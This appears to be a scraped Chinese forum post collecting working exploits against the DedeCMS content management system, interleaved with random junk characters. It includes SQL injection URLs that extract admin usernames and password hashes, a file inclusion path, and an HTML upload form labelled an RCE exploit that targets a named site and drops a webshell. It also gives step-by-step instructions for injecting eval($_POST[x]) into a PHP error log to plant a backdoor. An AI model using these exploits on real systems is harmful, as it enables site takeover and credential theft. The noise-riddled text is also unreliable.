7 Z4 f4 X$ k `$ k. [" b, m6 p% g: X7 e" g- h/ j
- H0 b4 l+ z8 I, A3 E3 U- H* I5 R# U
1 F, R, Q$ f4 l7 q; ~0 W+ \5 H V* y3 Y0 D! h* m) N; }/ j: E, z
- S0 n) e, |5 v$ E' i* J
7 l" Z) _5 O( z( \ 1 W( m! h, J3 r" N: n0 @7 b9 C 9 ^5 ?6 r% U. N1 X. s. j* n b; K# y$ }" R; G2 E织梦(Dedecms) V5.6 plus/carbuyaction.php 本地文件包含漏洞 / K2 V2 K' N, n- D6 fhttp://www.test.com/plus/carbuya ... urn&code=../../ - i/ G3 j$ y5 F+ G 4 F: i7 y( E. v3 h ' w" M+ N! S: i( F+ X) t- f $ t4 k3 c3 t: R$ V' Z5 U ]$ K: M8 J0 S2 {$ K; u & f! N9 ]2 Q) W" ?# R0 ?0 } 5 K. ]% w3 Y: e/ i0 S% x. h 9 e# K1 Q+ y9 r/ G 3 @0 x. j: P8 S( f6 Z( d ( _4 `/ U( |( Q" A- s4 Z0 r" ?+ m, l5 ~' N* f: H; Q6 N6 I" ]
DedeCms V5.6 plus/advancedsearch.php 任意sql语句执行漏洞 3 V4 r8 f# W- c" Kplus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20`%23@__admin` $ r' U" K9 H) g6 K) q密码是32位MD5减去头5位,减去尾七位,得到20 MD5密码,方法是,前减3后减1,得到16位MD5 ! e! Q6 l. T1 m e# T 8 z/ Y. o) B; v4 @* Q. ~" A . M4 {( ^6 A: q9 h, h" z9 A( C" ^) I. v% X/ c4 R) I4 X) D
8 h" C2 M, z# u% h
5 @% U4 }9 _& E: _7 f6 @# A 3 @; q3 \3 P1 O, v$ b% G; `: Y; J* Q! p- q0 W5 `
2 m3 ?- H4 q! w! `8 O8 O9 D
$ R2 V! E/ h$ k; ^7 J) ?- s k
% H9 x& |& ~2 r. r) V9 B织梦(Dedecms) 5.1 feedback_js.php 注入漏洞 # s- _4 O3 ?( R' a* Z2 Khttp://st0p/dedecms51/plus/feedback_js.php?arcurl=' union select "' and 1=2 union select 1,1,1,userid,3,1,3,3,pwd,1,1,3,1,1,1,1,1 from dede_admin where 1=1 union select * from dede_feedback where 1=2 and ''='" from dede_admin where ''=' 7 m+ K# R' C( |, K, U: m I7 p6 A; S/ w7 h; G+ I) i# M) y
2 ?& g4 W* i1 p0 W & d3 ^7 |2 m* m: `1 U! t: Q* W- F2 h# B% r& Y, @+ p6 x9 [& f
' P! t. l W, X# z$ R* U( g5 }) f3 B9 a$ ^: r! q- f3 @( z
3 ^% Y+ i0 L' _, z ( M4 x, o6 b) V( s2 K . r/ R% h' F' s4 ?. z& p3 G+ s- J1 L
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞 # `7 U; s( B( G# F' D<html> 1 ~) B; F5 ]* ~* S" N0 _- m<head>3 O" l2 q$ l* B0 G2 p6 r$ R
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>" a& J0 O5 D5 s6 \5 s5 [# g, w
</head> / z7 C# N" _3 X* O# H8 ^0 C* C<body style="FONT-SIZE: 9pt">9 P/ ~! B7 J2 e/ A& m. U& i) o) `
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />' o' u5 A' U+ _. a
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'> - _* z% V8 f4 y# Y) ^7 M<input type='hidden' name='activepath' value='/data/cache/' /> . B3 [+ F+ @# k/ N<input type='hidden' name='cfg_basedir' value='../../' /> 1 {8 `5 U) d3 t: u+ I; H<input type='hidden' name='cfg_imgtype' value='php' /> 6 ~6 m+ ]" v; P6 \<input type='hidden' name='cfg_not_allowall' value='txt' /> - N; p! ?& k9 i& s/ Q( u+ h<input type='hidden' name='cfg_softtype' value='php' />4 M7 U! T6 d' F( l) d* z
<input type='hidden' name='cfg_mediatype' value='php' />- I/ J$ R1 T9 a U3 L4 q
<input type='hidden' name='f' value='form1.enclosure' /> ( X- Y( R0 N: L% l; J: i* g8 C6 g<input type='hidden' name='job' value='upload' /> 5 A' H1 u# y! |) {( ~' o. t<input type='hidden' name='newname' value='fly.php' />" p: y' q# f9 k- f6 f
Select U Shell <input type='file' name='uploadfile' size='25' /> 7 J5 S3 L* y u0 {<input type='submit' name='sb1' value='确定' />6 c# h; t/ z" U( ^1 b' }
</form>$ k s* h7 b' M# ^- B
<br />It's just a exp for the bug of Dedecms V55...<br />$ A" F& k, t9 K
Need register_globals = on...<br />* ~: Y' V3 H9 p: J4 c0 M; b' j
Fun the game,get a webshell at /data/cache/fly.php...<br />8 z+ t) G0 q9 ]: {. \4 @
</body>, i: e0 ?2 j/ H3 j8 w" h( m
</html> 8 s8 g' H2 \' _2 a4 \& _1 H2 p* @, p( J
: |8 y9 p7 s' B" g! o
3 R' j! Y. [1 r' s/ } : ~/ h8 y" ]6 w3 }* J4 q5 S9 X3 N, H; S) v1 {3 R
, ]* C, F9 @: c- d& e9 C& q4 b1 W( k1 Q9 w" Y
0 N) ]- i2 t" A & e9 C& n7 R1 U: a9 A) A3 U# n" ~. g! @: _0 X. E- @# L* P
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞- G1 G4 F+ \# Q% R+ w1 r$ j4 x
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。 5 _. m) y3 z4 z4 ]; x2 S1. 访问网址: 0 [0 R ?! W0 _/ F3 fhttp://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?> 4 P7 z9 |2 b, l$ ^5 m可看见错误信息 * K. @0 k, g% m: d G ) ~# a& X# q4 j! |, Z; X , r$ G* i, c; S0 V. f9 e2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。. f0 J v5 l5 V9 h
int(3) Error: Illegal double '1024e1024' value found during parsing3 {/ K1 y. Y& n
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?> * J" H( n, T( i1 O. ~( j* ?) |, u Y- a# Y8 b( H" Q6 o9 k
% t0 r; z8 _. [4 k3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是 8 S0 F6 D/ u% x5 E# a 0 H# t* b2 }6 \5 v2 C z# i' P' {- ^/ y
<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”> ' i$ c" R! @/ v) U" ~ + @7 _) G; L1 c( n8 f# H ) C" S' E, A! c按确定后的看到第2步骤的信息表示文件木马上传成功." v( l7 t/ a0 o1 R0 l6 J, \1 X
+ [. [1 I/ K6 ^7 V; ^6 `
: u% S7 C. i* S* ]; @" v
5 |/ C& Y9 n0 [4 F2 e: W. M: W5 b8 x$ E6 {' E4 N
& j. G( ?- A" A$ P' U' ~* T : f; r! U) A: u7 `4 u2 g1 q% R" B* F3 L% A$ V; F) n! s9 N
) d# y+ \: N/ X1 E0 S
+ B& G9 \7 X( J- U, E' |; q/ B " t0 {8 F. D6 k2 x9 Z, ?+ `# Z+ N . U8 `$ k- a, h6 Z% @+ w- i# Q; b$ }' a7 W8 b! E
织梦(DedeCms)plus/infosearch.php 文件注入漏洞 / ?* ?# m9 W; O( Shttp://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/*